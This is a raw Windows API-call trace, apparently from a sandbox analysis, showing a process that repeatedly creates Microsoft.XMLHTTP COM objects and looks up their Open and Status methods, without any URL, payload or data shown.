	[0681.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0681.153] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0681.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0681.155] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.155] SysStringLen (param_1=0x0) returned 0x0
	[0681.155] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.155] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0681.155] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0681.156] ??2@YAPEAX_K@Z () returned 0x62f330
	[0681.156] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0681.156] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.156] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0681.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0681.156] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0681.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.156] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0681.159] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.159] SysStringLen (param_1=0x0) returned 0x0
	[0681.159] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.159] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0681.159] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0681.159] ??2@YAPEAX_K@Z () returned 0x62f310
	[0681.159] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0681.159] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.159] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0681.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0681.160] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0681.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.160] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0681.160] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.160] SysStringLen (param_1=0x0) returned 0x0
	[0681.160] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.160] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0681.160] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0681.160] ??2@YAPEAX_K@Z () returned 0x62f330
	[0681.160] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0681.160] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.161] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0681.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0681.161] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0681.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.161] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0681.161] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.161] SysStringLen (param_1=0x0) returned 0x0
	[0681.161] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.161] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0681.161] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0681.162] ??2@YAPEAX_K@Z () returned 0x62f310
	[0681.162] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0681.162] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.162] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0681.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0681.162] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0681.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.162] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0681.162] longjmp () 
	[0681.162] longjmp () 
	[0681.162] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.162] SysStringLen (param_1=0x0) returned 0x0
	[0681.162] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.163] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0681.163] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0681.163] ??2@YAPEAX_K@Z () returned 0x62f330
	[0681.163] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.163] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0681.163] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.163] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0681.163] longjmp () 
	[0681.164] longjmp () 
	[0681.164] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0681.164] SysStringLen (param_1=0x0) returned 0x0
	[0681.164] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0681.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0681.164] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0681.164] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0681.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0681.164] ??2@YAPEAX_K@Z () returned 0x62f310
	[0681.164] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0681.164] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0681.164] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0681.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0681.164] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0681.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.164] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0681.165] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
